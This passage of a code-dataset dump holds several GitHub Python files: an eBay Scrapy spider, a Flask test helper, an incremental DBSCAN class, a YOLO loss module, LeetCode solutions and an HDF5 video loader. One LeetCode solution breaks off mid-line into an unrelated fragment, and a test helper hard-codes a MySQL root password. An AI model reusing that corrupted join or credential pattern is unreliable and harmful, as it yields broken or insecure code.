res.css('ul.lvprices li:nth-child(2).lvformat span ::text').extract_first()\n bids = bids.split(\" \")\n else:\n bids = []\n if res.css('ul div.tsp'):\n best = res.css('ul div.tsp + li + li span ::text').extract_first()\n best = best.strip()\n if best == \"Buy It Now\":\n scrap = True\n else:\n scrap = False\n if len(bids) > 1:\n if bids[1] == \"bids\" or bids[1] == \"bid\" and scrap == False:\n pass\n else:\n href = res.css('div div a::attr(href)').extract_first()\n yield scrapy.Request(response.urljoin(href), callback=self.product_details)\n else:\n href = res.css('div div a::attr(href)').extract_first()\n yield scrapy.Request(response.urljoin(href), callback=self.product_details)\n next_page = response.css('tr td.pages a.curr + a ::attr(href)').extract_first()\n self.f.write('Step 6')\n except Exception as e:\n f = open(\"./ebay_exception.txt\", \"w\")\n f.write(str(e))\n # if next_page:\n # yield scrapy.Request(response.urljoin(next_page), callback=self.parse)\n\n def product_details(self, response):\n try:\n title = response.css('.it-ttl ::text').extract()\n self.f.write('Step 7')\n title = title[1]\n if title:\n str_title = title.split(\" \")\n else:\n str_title = \" \"\n brand = str_title[1]\n if len(str_title) > 2:\n model = str_title[2]\n else:\n model = \" \"\n price = response.css('div#vi-mskumap-none span ::text').extract_first()\n price = price.replace(\"US $\", \"\")\n price = price.replace(\",\", \"\")\n src = []\n if response.css('div#vi_main_img_fs ul.lst.icon li'):\n for res in response.css('ul.lst.icon li'):\n img = res.css('td.tdThumb div img::attr(src)').extract_first()\n img = img.replace(\"64.\", \"500.\")\n src.append(img)\n else:\n img = response.css('div#mainImgHldr img:nth-child(2)::attr(src)').extract_first()\n src.append(img)\n\n specs = {}\n for res in response.css('div.itemAttr div table tr'):\n\n key = res.css('td:nth-child(1) ::text').extract_first()\n if res.css('td:nth-child(2) h2'):\n value = res.css('td:nth-child(2) h2 ::text').extract_first()\n else:\n value = res.css('td:nth-child(2) span ::text').extract_first()\n\n value = res.css('td:nth-child(2) span ::text').extract_first()\n key1 = res.css('td:nth-child(3) ::text').extract_first()\n if res.css('td:nth-child(4) h2'):\n value1 = res.css('td:nth-child(4) h2 ::text').extract_first()\n else:\n value1 = res.css('td:nth-child(4) span ::text').extract_first()\n # value1=res.css('td:nth-child(4) span ::text').extract_first()\n if value is not None:\n value = value.strip()\n if key is not None:\n key = key.replace(\":\", \"\")\n key = key.strip()\n\n if value1 is not None:\n value1 = value1.strip()\n if key1 is not None:\n key1 = key1.replace(\":\", \"\")\n key1 = key1.strip()\n if key == \"Model\":\n if value is None:\n value = res.css('td:nth-child(2) h2 ::text').extract_first()\n\n if key is not None:\n specs[key] = value\n if key1 is not None:\n specs[key1] = value1\n if key == \"Year\":\n year = value\n if key1 == \"Year\":\n year = value1\n if key == \"Mileage\":\n mileage = value\n if key1 == \"Mileage\":\n mileage = value1\n mileage = mileage.replace(\",\", \"\")\n mileage = mileage.strip()\n if mileage:\n miles = float(mileage)\n conv_fac = 1.609\n kilometers = miles * conv_fac\n else:\n kilometers = \"\"\n parameters = parse_qs(urlparse(response.url).query)\n try:\n reference_id = parameters['item']\n reference_id = reference_id[0]\n except Exception as e:\n parames = response.url.split(\"/\")\n ref_param = parames[len(parames) - 1]\n reference_id = ref_param.split('?')\n reference_id = 
reference_id[0]\n # if not total_resultes:\n # total_resultes=''\n # yield {\"src\":src,\"href\":href,\"title\":title,\"price\":price,\"year\":year.strip(),\"brand\":brand,\"model\":model}\n self.f.write(\"\\n %s\" %title)\n yield {\"src\": src, \"href\": response.url, \"specs\": specs, \"title\": title, \"price\": price, \"brand\": brand,\n \"model\": model, \"year\": year, \"reference_id\": reference_id, \"mileage\": mileage, \"kilometers\": kilometers,\n \"description\": \"\", \"total_results\": total_results, \"page_count\": page_count}\n except Exception as e:\n f = open(\"./ebay_exception.txt\", \"w\")\n f.write(str(e))\n\n\nif __name__ == \"__main__\":\n process = CrawlerProcess()\n process.crawl(BlogSpider)\n process.start()\n","repo_name":"tripaak/webscrapping","sub_path":"ebay/ebay/spiders/ebay_spider copy.py","file_name":"ebay_spider copy.py","file_ext":"py","file_size_in_byte":13413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39322273251","text":"from flask import Flask\nfrom flaskext.mysql import MySQL\n\nclass MockPostRequest(object):\n def __init__(self, json_data):\n self.json = json_data\n\n\nclass MockGetRequest(object):\n def __init__(self, data):\n self.args = Args(data)\n\n\nclass Args(object):\n def __init__(self, data):\n self.data = data\n \n def getlist(self, key):\n return self.data[key] if key in self.data else None\n\n\ndef setup_test_db(): \n app = Flask(__name__)\n mysql_test = MySQL()\n\n # MySQL configurations\n app.config['MYSQL_DATABASE_USER'] = 'root'\n app.config['MYSQL_DATABASE_PASSWORD'] = '0027'\n app.config['MYSQL_DATABASE_DB'] = 'testschooladmin'\n app.config['MYSQL_DATABASE_HOST'] = 'localhost'\n mysql_test.init_app(app)\n\n # Initialize test database\n try:\n conn = mysql_test.connect()\n cursor = conn.cursor()\n cursor.callproc('init_db')\n conn.commit()\n finally:\n cursor.close()\n conn.close()\n \n return mysql_test\n","repo_name":"szenius/school-admin","sub_path":"test/test_service/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"18537038765","text":"import pandas as pd\r\nimport io\r\nfrom sklearn.cluster import DBSCAN\r\n\r\n\r\ndef distance(element_1, element_2):\r\n \"\"\"\r\n Calculates the distance between the element and the mean_core_element using the Euclidean distance\r\n :param element_1: the current element that needs to be checked\r\n :param element_2: the element to check the distance from\r\n :returns distance: the Euclidean distance between the element_1 and the element_2(float)\r\n \"\"\"\r\n euclidean_distance = ((element_1['CPU'] - element_2['CPU']) ** 2 +\r\n (element_1['Memory'] - element_2['Memory']) ** 2 +\r\n (element_1['Disk'] - element_2['Disk']) ** 2) ** (1 / 2)\r\n return euclidean_distance.iloc[0].astype(float)\r\n\r\n\r\nclass IncrementalDBSCAN:\r\n\r\n def __init__(self, eps=5, min_samples=3):\r\n \"\"\"\r\n Constructor the Incremental_DBSCAN class.\r\n :param eps: the maximum radius that an element should be in order to formulate a cluster\r\n :param min_samples: the minimum samples required in order to formulate a cluster\r\n In order to identify the optimum eps and min_samples we need to make a KNN\r\n \"\"\"\r\n self.dataset = pd.DataFrame(columns=['CPU', 'Memory', 'Disk'])\r\n self.labels = pd.DataFrame(columns=['Label'])\r\n self.final_dataset = pd.DataFrame(columns=['CPU', 'Memory', 'Disk', 'Label'])\r\n 
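# The constructor docstring above notes that eps/min_samples should come from a
# k-nearest-neighbours pass; the usual recipe is a sorted k-distance curve, with
# eps read off at the "elbow". A sketch with scikit-learn and synthetic data:
import numpy as np
from sklearn.neighbors import NearestNeighbors

def k_distance(X, k=3):
    # distance from every point to its k-th nearest neighbour, sorted ascending
    nn = NearestNeighbors(n_neighbors=k + 1).fit(X)  # +1: each point is its own 0-NN
    dists, _ = nn.kneighbors(X)
    return np.sort(dists[:, -1])

# X = np.random.rand(100, 3); plot k_distance(X, k=3) and look for the elbow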
self.mean_core_elements = pd.DataFrame(columns=['CPU', 'Memory', 'Disk', 'Label'])\r\n self.eps = eps\r\n self.min_samples = min_samples\r\n self.largest_cluster = -1\r\n self.cluster_limits = 0\r\n self.largest_cluster_limits = 0\r\n\r\n def set_data(self, message):\r\n \"\"\"\r\n After the connection with the RabbitMQ is complete a message is received.\r\n This function is used to gather the message from the consumer. It appends the newly arrived data to the\r\n dataset used for clustering.\r\n :param message: The message consumed by the RabbitMQ. Should be a 3-column, comma-separated text.\r\n \"\"\"\r\n # store the collected message to a temp dataframe\r\n temp = pd.read_csv(io.StringIO(message), sep=',', header=None)\r\n temp.columns = ['CPU', 'Memory', 'Disk']\r\n # append the temp to the dataset\r\n self.dataset = self.dataset.append(temp, ignore_index=True)\r\n\r\n def batch_dbscan(self):\r\n \"\"\"\r\n The DBSCAN algorithm taken from the sklearn library. It is used to formulate the clusters the first time.\r\n Based on the outcomes of this algorithm the Incremental_DBSCAN algorithm\r\n \"\"\"\r\n batch_dbscan = DBSCAN(eps=self.eps, min_samples=self.min_samples).fit(self.dataset)\r\n # Get the number of the clusters created\r\n # n_clusters_ = len(set(self.labels)) - (1 if -1 in self.labels else 0)\r\n self.add_labels_to_dataset(batch_dbscan.labels_)\r\n\r\n # Cast everything in the final_dataset as integer.\r\n # If this line is missing, it throws an error\r\n self.final_dataset = self.final_dataset.astype(int)\r\n # self.incremental_dbscan_()\r\n # self.sort_dataset_based_on_labels()\r\n # self.find_mean_core_element()\r\n # response = self.calculate_min_distance_centroid()\r\n # # print(response)\r\n # if response is not None:\r\n # self.check_min_samples_in_eps_or_outlier(min_dist_index=response)\r\n # self.largest_cluster = self.find_largest_cluster()\r\n\r\n def add_labels_to_dataset(self, labels):\r\n \"\"\"\r\n This function adds the labels on the dataset after the batch DBSCAN is done\r\n :param labels: The labels param should be a list that describes the cluster of each element.\r\n If an element is considered as an outlier it should be equal to -1\r\n \"\"\"\r\n self.labels = pd.DataFrame(labels, columns=['Label'])\r\n self.final_dataset = pd.concat([self.dataset, self.labels], axis=1)\r\n\r\n def sort_dataset_based_on_labels(self):\r\n \"\"\"\r\n This function sorts the dataset based on the Label of each cluster.\r\n \"\"\"\r\n # print(self.final_dataset)\r\n self.final_dataset = self.final_dataset.sort_values(by=['Label'])\r\n # Cast everything in the final_dataset as integer.\r\n # If this line is missing, it throws an error\r\n self.final_dataset = self.final_dataset.astype(int)\r\n\r\n def find_mean_core_element(self):\r\n \"\"\"\r\n This function calculates the average core elements of each cluster.\r\n Note: It does not calculate an average core element for the outliers.\r\n \"\"\"\r\n # Exclude rows labeled as outliers\r\n self.mean_core_elements = self.final_dataset.loc[self.final_dataset['Label'] != -1]\r\n # Find the mean core elements of each cluster\r\n self.mean_core_elements = self.mean_core_elements \\\r\n .groupby('Label')['CPU', 'Memory', 'Disk'].mean()\r\n # print(self.mean_core_elements)\r\n # response = self.calculate_min_distance_centroid()\r\n # # print(response)\r\n # if response is not None:\r\n # self.check_min_samples_in_eps_or_outlier(min_dist_index=response)\r\n\r\n def calculate_min_distance_centroid(self):\r\n \"\"\"\r\n This function 
identifies the closest mean_core_element to the incoming element\r\n that has not yet been added to a cluster or considered as outlier.\r\n The distance is calculated using the distance function as it is described above.\r\n\r\n :returns min_dist_index: if there is a cluster that is closest to the new entry element\r\n or None if there are no clusters yet.\r\n \"\"\"\r\n min_dist = None\r\n min_dist_index = None\r\n\r\n # Check if there are elements in the core_elements dataframe.\r\n # In other words if there are clusters created by the DBSCAN algorithm\r\n if not self.mean_core_elements.empty:\r\n # Iterate over the mean_core_elements dataframe and find the minimum distance\r\n for index, current_mean_core_element in self.mean_core_elements.iterrows():\r\n tmp_dist = distance(element_1=self.final_dataset.tail(n=1),\r\n element_2=current_mean_core_element)\r\n if min_dist is None:\r\n min_dist = tmp_dist\r\n min_dist_index = index\r\n elif tmp_dist < min_dist:\r\n min_dist = tmp_dist\r\n min_dist_index = index\r\n print('Minimum distance is: ', min_dist, ' at cluster ', min_dist_index)\r\n return min_dist_index\r\n else:\r\n return None\r\n\r\n def check_min_samples_in_eps_or_outlier(self, min_dist_index):\r\n \"\"\"\r\n This function checks whether there are at least min_samples in the given radius from the new\r\n entry element.\r\n If there are at least min_samples this element will be added to the cluster and the\r\n mean_core_element of the current cluster has to be re-calculated.\r\n If not, there are two options.\r\n 1. Check if there are at least min_samples outliers in the given radius in order to create a new\r\n cluster, or\r\n 2. Consider it as a new outlier\r\n\r\n :param min_dist_index: This is the parameter that contains information related to the closest\r\n mean_core_element to the current element.\r\n \"\"\"\r\n\r\n # Use only the elements of the closest cluster from the new entry element\r\n new_element = self.final_dataset.tail(1)\r\n nearest_cluster_elements = self.final_dataset[self.final_dataset['Label'] == min_dist_index]\r\n min_samples_count = 0\r\n for index, cluster_element in nearest_cluster_elements.iterrows():\r\n if (cluster_element['CPU'] - self.eps\r\n <= float(new_element['CPU']) <= cluster_element['CPU'] + self.eps) \\\r\n and (cluster_element['Memory'] - self.eps\r\n <= float(new_element['Memory']) <= cluster_element['Memory'] + self.eps) \\\r\n and (cluster_element['Disk'] - self.eps\r\n <= float(new_element['Disk']) <= cluster_element['Disk'] + self.eps):\r\n min_samples_count += 1\r\n\r\n if min_samples_count >= self.min_samples:\r\n # The new element has enough cluster labels in the eps range\r\n # and is now considered as a new member of the cluster.\r\n # The mean core element of this cluster is re-calculated.\r\n self.final_dataset.loc[self.final_dataset.index[-1], 'Label'] = min_dist_index\r\n self.find_mean_core_element()\r\n else:\r\n # The new element is not added to its closest cluster. 
Now we have to check\r\n # whether it is going to be considered an outlier or it will form a new cluster\r\n # with other outliers.\r\n outliers = self.final_dataset[self.final_dataset['Label'] == -1]\r\n min_outliers_count = 0\r\n new_cluster_elements = pd.DataFrame(columns=['Index'])\r\n for index, outlier in outliers.iterrows():\r\n if (outlier['CPU'] - self.eps\r\n <= float(new_element['CPU']) <= outlier['CPU'] + self.eps) \\\r\n and (outlier['Memory'] - self.eps\r\n <= float(new_element['Memory']) <= outlier['Memory'] + self.eps) \\\r\n and (outlier['Disk'] - self.eps\r\n <= float(new_element['Disk']) <= outlier['Disk'] + self.eps):\r\n min_outliers_count += 1\r\n new_cluster_elements = new_cluster_elements.append({\"Index\": index}, ignore_index=True)\r\n\r\n if min_outliers_count >= self.min_samples:\r\n # The new element has enough outliers in its eps radius in order to form a new cluster.\r\n new_cluster_number = int(self.final_dataset['Label'].max()) + 1\r\n for new_cluster_element in new_cluster_elements.iterrows():\r\n self.final_dataset.loc[\r\n self.final_dataset.index[int(new_cluster_element[1])], 'Label'] = new_cluster_number\r\n\r\n print(\"A new cluster is now formed out of already existing outliers.\")\r\n\r\n # The new cluster's mean core element is calculated after the cluster's creation.\r\n self.find_mean_core_element()\r\n\r\n else:\r\n # The new element is an outlier.\r\n # It is not close enough to its closest in order to be added to it,\r\n # neither has enough outliers close by to form a new cluster.\r\n self.final_dataset.loc[self.final_dataset.index[-1], 'Label'] = -1\r\n\r\n print(\"The new element in the dataset: \\n\", self.final_dataset.tail(1))\r\n\r\n def incremental_dbscan_(self):\r\n self.final_dataset = self.final_dataset.append({'CPU': self.dataset.iloc[-1]['CPU'],\r\n 'Memory': self.dataset.iloc[-1]['Memory'],\r\n 'Disk': self.dataset.iloc[-1]['Disk'],\r\n 'Label': -1}, ignore_index=True)\r\n self.find_mean_core_element()\r\n min_distance_mean_core_element_index = self.calculate_min_distance_centroid()\r\n if min_distance_mean_core_element_index is not None:\r\n self.check_min_samples_in_eps_or_outlier(min_dist_index=min_distance_mean_core_element_index)\r\n self.largest_cluster = self.find_largest_cluster()\r\n self.find_cluster_limits()\r\n self.get_largest_cluster_limits()\r\n\r\n def find_largest_cluster(self):\r\n \"\"\"\r\n This function identifies the largest of the clusters with respect to the number of the core elements.\r\n The largest cluster is the one with the most core elements in it.\r\n\r\n :returns: the number of the largest cluster. 
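Note that the neighborhood rule used in the two membership loops above is an axis-aligned box test (each of CPU, Memory and Disk must lie within plus or minus eps independently), not a Euclidean ball like the distance() helper. A minimal sketch with hypothetical values:

def in_eps_box(candidate, neighbor, eps):
    # a point qualifies only if it lies within +/- eps of the neighbor on every axis
    return all(neighbor[k] - eps <= candidate[k] <= neighbor[k] + eps
               for k in ('CPU', 'Memory', 'Disk'))

candidate = {'CPU': 30, 'Memory': 40, 'Disk': 10}
print(in_eps_box(candidate, {'CPU': 34, 'Memory': 42, 'Disk': 11}, eps=5))  # True
print(in_eps_box(candidate, {'CPU': 36, 'Memory': 42, 'Disk': 11}, eps=5))  # False: CPU differs by 6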
If -1 is returned, then there are no clusters created\r\n in the first place.\r\n \"\"\"\r\n cluster_size = self.final_dataset.groupby('Label')['Label'].count()\r\n # cluster_size = cluster_size['CPU'].value_counts()\r\n try:\r\n cluster_size = cluster_size.drop(labels=[-1])\r\n except ValueError:\r\n print(\"The label -1 does not exist\")\r\n largest_cluster = -1\r\n if not cluster_size.empty:\r\n largest_cluster = cluster_size.idxmax()\r\n print('The cluster with the most elements is cluster No: ', cluster_size.idxmax())\r\n return largest_cluster\r\n else:\r\n print('There aren\\'t any clusters formed yet')\r\n return largest_cluster\r\n\r\n def find_cluster_limits(self):\r\n self.cluster_limits = self.final_dataset\\\r\n .groupby(self.final_dataset['Label'])\\\r\n .agg(['min', 'max'])\r\n print(self.cluster_limits)\r\n self.cluster_limits.to_json(r'../json_exports/all_cluster_limits.json')\r\n\r\n def get_largest_cluster_limits(self):\r\n self.largest_cluster_limits = self.cluster_limits.iloc[self.largest_cluster+1]\r\n self.largest_cluster_limits.to_json(r'../json_exports/largest_cluster_limits.json')\r\n print(self.largest_cluster_limits)\r\n","repo_name":"csymvoul/Incremental_DBSCAN","sub_path":"incremental_dbscan/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13288,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"52"} +{"seq_id":"73764174565","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\nclass yoloLoss(nn.Module):\r\n def __init__(self, S, B, l_coord, l_noobj):\r\n super(yoloLoss,self).__init__()\r\n self.S = S\r\n self.B = B\r\n self.l_coord = l_coord\r\n self.l_noobj = l_noobj\r\n\r\n def compute_iou(self, box1, box2):\r\n '''Compute the intersection over union of two set of boxes, each box is [x1,y1,x2,y2].\r\n Args:\r\n box1: (tensor) bounding boxes, sized [N,4].\r\n box2: (tensor) bounding boxes, sized [M,4].\r\n Return:\r\n (tensor) iou, sized [N,M].\r\n '''\r\n N = box1.size(0)\r\n M = box2.size(0)\r\n\r\n lt = torch.max(\r\n box1[:,:2].unsqueeze(1).expand(N,M,2), # [N,2] -> [N,1,2] -> [N,M,2]\r\n box2[:,:2].unsqueeze(0).expand(N,M,2), # [M,2] -> [1,M,2] -> [N,M,2]\r\n )\r\n\r\n rb = torch.min(\r\n box1[:,2:].unsqueeze(1).expand(N,M,2), # [N,2] -> [N,1,2] -> [N,M,2]\r\n box2[:,2:].unsqueeze(0).expand(N,M,2), # [M,2] -> [1,M,2] -> [N,M,2]\r\n )\r\n\r\n wh = rb - lt # [N,M,2]\r\n wh[wh<0] = 0 # clip at 0\r\n inter = wh[:,:,0] * wh[:,:,1] # [N,M]\r\n\r\n area1 = (box1[:,2]-box1[:,0]) * (box1[:,3]-box1[:,1]) # [N,]\r\n area2 = (box2[:,2]-box2[:,0]) * (box2[:,3]-box2[:,1]) # [M,]\r\n area1 = area1.unsqueeze(1).expand_as(inter) # [N,] -> [N,1] -> [N,M]\r\n area2 = area2.unsqueeze(0).expand_as(inter) # [M,] -> [1,M] -> [N,M]\r\n\r\n iou = inter / (area1 + area2 - inter)\r\n return iou\r\n\r\n def forward(self,pred_tensor, target_tensor):\r\n '''\r\n pred_tensor: (tensor) size(batchsize,S,S,Bx5+20=30) [x,y,w,h,c]\r\n target_tensor: (tensor) size(batchsize,S,S,30)\r\n '''\r\n device = pred_tensor.device\r\n N = pred_tensor.size()[0]\r\n coo_mask = target_tensor[:, :, :, 4] > 0 # 包含 object 的 mask\r\n noo_mask = target_tensor[:, :, :, 4] == 0 # 包含 object 的 mask\r\n coo_mask = coo_mask.unsqueeze(-1).expand_as(target_tensor)\r\n noo_mask = noo_mask.unsqueeze(-1).expand_as(target_tensor)\r\n\r\n coo_pred = pred_tensor[coo_mask].view(-1, 30)\r\n box_pred = coo_pred[:, :10].contiguous().view(-1, 5) # box1[x1,y1,w1,h1,c1]、box2[x2,y2,w2,h2,c2]\r\n class_pred = coo_pred[:, 10:] # 
class probability\r\n \r\n coo_target = target_tensor[coo_mask].view(-1, 30)\r\n box_target = coo_target[:, :10].contiguous().view(-1, 5)\r\n class_target = coo_target[:, 10:]\r\n\r\n # compute not contain obj loss\r\n noo_pred = pred_tensor[noo_mask].view(-1, 30)\r\n noo_target = target_tensor[noo_mask].view(-1, 30)\r\n\r\n noo_pred_mask = torch.ByteTensor(noo_pred.size())\r\n noo_pred_mask.zero_()\r\n noo_pred_mask[:, 4] = 1\r\n noo_pred_mask[:, 9] = 1\r\n noo_pred_c = noo_pred[noo_pred_mask] #noo pred只需要计算 c 的损失 size[-1,2]\r\n noo_target_c = noo_target[noo_pred_mask]\r\n noobj_loss = F.mse_loss(noo_pred_c,noo_target_c, reduction=\"sum\")\r\n\r\n #compute contain obj loss\r\n coo_response_mask = torch.ByteTensor(box_target.size())\r\n coo_response_mask.zero_()\r\n coo_not_response_mask = torch.ByteTensor(box_target.size())\r\n coo_not_response_mask.zero_()\r\n box_target_iou = torch.zeros(box_target.size()).to(device)\r\n for i in range(0, box_target.size()[0], 2): #choose the best iou box\r\n # 取出一个 grid cell 的两个 predict bbox\r\n box1 = box_pred[i:i+2]\r\n # 转换到原图像的尺度范围下 的相对位置\r\n box1_xyxy = torch.FloatTensor(box1.size())\r\n box1_xyxy[:, :2] = box1[:, :2] / 14. - 0.5 * box1[:, 2:4]\r\n box1_xyxy[:, 2:4] = box1[:, :2] / 14. + 0.5 * box1[:, 2:4]\r\n\r\n # 取出 target 的 bbox 的坐标\r\n box2 = box_target[i].view(-1,5)\r\n # 转换到原图像的尺度范围下 的相对位置\r\n box2_xyxy = torch.FloatTensor(box2.size())\r\n box2_xyxy[:, :2] = box2[:, :2]/14. - 0.5*box2[:, 2:4]\r\n box2_xyxy[:, 2:4] = box2[:, :2]/14. + 0.5*box2[:, 2:4]\r\n\r\n # 分别计算两个 predict bbox 与 target bbox 的 IoU\r\n iou = self.compute_iou(box1_xyxy[:,:4],box2_xyxy[:, :4]) #[2,1]\r\n max_iou, max_index = iou.max(0)\r\n max_index = max_index.data.to(device)\r\n \r\n coo_response_mask[i+max_index] = 1\r\n coo_not_response_mask[i+1-max_index] = 1\r\n\r\n box_target_iou[i+max_index,torch.LongTensor([4]).to(device)] = (max_iou).data.to(device)\r\n box_target_iou = box_target_iou.to(device)\r\n\r\n #1.response loss\r\n box_pred_response = box_pred[coo_response_mask].view(-1, 5)\r\n box_target_response_iou = box_target_iou[coo_response_mask].view(-1, 5)\r\n box_target_response = box_target[coo_response_mask].view(-1, 5)\r\n contain_loss = F.mse_loss(box_pred_response[:, 4], box_target_response_iou[:,4], reduction=\"sum\")\r\n loc_loss = F.mse_loss(box_pred_response[:, :2],box_target_response[:, :2], reduction=\"sum\") \\\r\n + F.mse_loss(torch.sqrt(box_pred_response[:, 2:4]),torch.sqrt(box_target_response[:, 2:4]), reduction=\"sum\")\r\n\r\n #2.not response loss\r\n box_pred_not_response = box_pred[coo_not_response_mask].view(-1, 5)\r\n box_target_not_response = box_target[coo_not_response_mask].view(-1, 5)\r\n box_target_not_response[:, 4] = 0\r\n not_contain_loss = F.mse_loss(box_pred_not_response[:, 4], box_target_not_response[:, 4], reduction=\"sum\")\r\n\r\n # 3.class loss\r\n class_loss = F.mse_loss(class_pred, class_target, reduction=\"sum\")\r\n\r\n # return (self.l_coord*loc_loss + 2 * contain_loss + not_contain_loss + self.l_noobj*noobj_loss + class_loss)/N\r\n\r\n return (self.l_coord * loc_loss + contain_loss + self.l_noobj * (noobj_loss + not_contain_loss) + class_loss) / N\r\n\r\n","repo_name":"Enzo-MiMan/cv_related_collections","sub_path":"object_detection/yolo_v1/yoloLoss.py","file_name":"yoloLoss.py","file_ext":"py","file_size_in_byte":6000,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"52"} +{"seq_id":"35237954792","text":"class Solution:\n def longestPalindrome(self, s: str) -> str:\n size = 
len(s)\n if size <= 1:\n return s\n longest_l = 1\n curlen = 0\n res = s[0]\n dp = [[False for _ in range(size)] for _ in range(size)] # 存储用的表\n for r in range(1, size):\n for l in range(r): # 暴力法也得有这个循环,完全一样。但是暴力法后面判\n # 断一个字符串是不是回文需要n的时间复杂度,动态规划不需要\n if s[l] == s[r] and (r - l <= 2 or dp[l+1][r-1]): # 状态转移方程以及边界\n dp[l][r] = True\n curlen = r - l + 1 # 求得此时长度\n if curlen > longest_l: # 求得最大长度并用一个字符串记录\n longest_l = curlen\n res = s[l:r+1]\n return res\n\n\nsolution = Solution()\nm = solution.longestPalindrome('fdfgabcbad')\nprint(m)\n\n\n\n","repo_name":"Mrhairui/leetcode","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29617369437","text":"from app import app\nfrom app.web import web\n\n\n__author__ = \"yangxin\"\n\n# 将 蓝图对象 注册到 flask app 实例中\napp.register_blueprint(web)\n\n# 如果该文件是 python 的入口文件,则下面的代码会被执行,如果改文件被导入到其他模块了,则下面的代码不会被执行\nif __name__ == \"__main__\":\n # 其实,在生产环境中,我们是使用 nginx + uwsgi 来启动项目的,下面的代码根本不会被执行\n # 因为,我们的项目是作为一个模块导入到 uwsgi 服务器里面\n app.run(\n host=app.config[\"HOST\"],\n port=app.config[\"PORT\"],\n debug=app.config[\"DEBUG\"],\n threaded=True,\n )\n","repo_name":"yancey92/fisher","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11505927530","text":"\"\"\"\n Given a sorted array A of unique numbers, find the K-th missing number starting from the leftmost number of the array.\n\n \n\n Example 1:\n\n Input: A = [4,7,9,10], K = 1\n Output: 5\n Explanation:\n The first missing number is 5.\n Example 2:\n\n Input: A = [4,7,9,10], K = 3\n Output: 8\n Explanation:\n The missing numbers are [5,6,8,...], hence the third missing number is 8.\n Example 3:\n\n Input: A = [1,2,4], K = 3\n Output: 6\n Explanation:\n The missing numbers are [3,5,6,7,...], hence the third missing number is 6.\n \n\n Note:\n\n 1 <= A.length <= 50000\n 1 <= A[i] <= 1e7\n 1 <= K <= 1e8\n Accepted\n 7,862\n Submissions\n 14,570\n\"\"\"\nclass Solution:\n def missingElement(self, nums: List[int], k: int) -> int:\n if nums[-1] -nums[0]-1-len(nums)+2 12 and write1 > 12: \n widx += 1\n\nprint(f\"0 Rx {np.mean(rx0)} {np.std(rx0)}, Tx {np.mean(tx0)} {np.std(tx0)}\")\nprint(f\"1 Rx {np.mean(rx1)} {np.std(rx1)}, Tx {np.mean(tx1)} {np.std(tx1)}\")\n","repo_name":"cablelabs/mass","sub_path":"scripts/addappcontext.py","file_name":"addappcontext.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75329666404","text":"import h5py\nimport cv2\nimport imageio\nimport io\nimport hashlib\nimport numpy as np\nimport os\nimport random\nimport pickle as pkl\n\n\nclass ACTION_MISMATCH:\n ERROR = 0\n PAD_ZERO = 1\n CLEAVE = 2\n\n\nclass STATE_MISMATCH:\n ERROR = 0\n PAD_ZERO = 1\n CLEAVE = 2\n\n\nclass HDF5Loader:\n def __init__(self, f_name, file_metadata, hparams, check_hash=True):\n self._file_metadata = file_metadata\n self._hparams = hparams\n\n assert os.path.exists(f_name) and os.path.isfile(f_name), \"invalid f_name\"\n with open(f_name, 'rb') as f:\n buf = f.read()\n if check_hash:\n assert hashlib.sha256(buf).hexdigest() == file_metadata['sha256'], \"file hash doesn't match meta-data. 
maybe delete meta-data and re-generate?\"\n # self._hf = h5py.File(io.BytesIO(buf), 'r')\n self._hf = h5py.File(f_name, 'r')\n \n\n # start_time, n_states = 0, min([file_metadata['state_T'], file_metadata['img_T'], file_metadata['action_T'] + 1])\n # assert n_states > 1, \"must be more than one state in loaded tensor!\"\n # if 1 < hparams['load_T'] < n_states:\n # start_time = rng.randint(0, n_states - hparams['load_T'])\n # n_states = hparams['load_T']\n\n # images = [load_camera_imgs(c, start_time, n_states)[None] for c in hparams['cams_to_load']]\n # images = np.swapaxes(np.concatenate(images, 0), 0, 1)\n # images = np.transpose(images, (0, 1, 4, 2, 3))\n # actions = load_actions(hf, file_metadata, hparams).astype(np.float32)[start_time:start_time + n_states-1]\n # full_state = load_states(hf, file_metadata, hparams).astype(np.float32)\n # states = full_state[start_time:start_time + n_states]\n\n def load_video(self, cam_index, target_dims=None, start_time=0, n_load=None):\n if target_dims is None:\n target_dims = self._hparams['img_size']\n cam_group = self._hf['env']['cam{}_video'.format(cam_index)]\n old_dims = self._file_metadata['frame_dim']\n length = self._file_metadata['img_T']\n encoding = self._file_metadata['img_encoding']\n image_format = self._file_metadata['image_format']\n\n if n_load is None and start_time == 0:\n n_load = length\n elif n_load is None:\n raise ValueError(\"Must supply both start_time and n_load or neither!\")\n\n old_height, old_width = old_dims\n target_height, target_width = target_dims\n resize_method = cv2.INTER_CUBIC\n if target_height * target_width < old_height * old_width:\n resize_method = cv2.INTER_AREA\n \n images = np.zeros((n_load, target_height, target_width, 3), dtype=np.uint8)\n if encoding == 'mp4':\n buf = io.BytesIO(cam_group['frames'][:].tostring())\n img_buffer = [img for t, img in enumerate(imageio.get_reader(buf, format='mp4')) if start_time <= t < n_load + start_time]\n try:\n imageio._proc.kill()\n except:\n pass\n elif encoding == 'jpg':\n img_buffer = [cv2.imdecode(cam_group['frame{}'.format(t)][:], cv2.IMREAD_COLOR)\n for t in range(start_time, start_time + n_load)]\n else: \n raise ValueError(\"encoding not supported\")\n \n for t, img in enumerate(img_buffer):\n if (old_height, old_width) == (target_height, target_width):\n images[t] = img\n else:\n images[t] = cv2.resize(img, (target_width, target_height), interpolation=resize_method)\n if image_format == 'RGB':\n return images\n elif image_format == 'BGR':\n return images[:, :, :, ::-1]\n raise NotImplementedError\n\n def load_image(self, target_dims=None, start_time=0, n_load=None):\n if target_dims is None:\n target_dims = 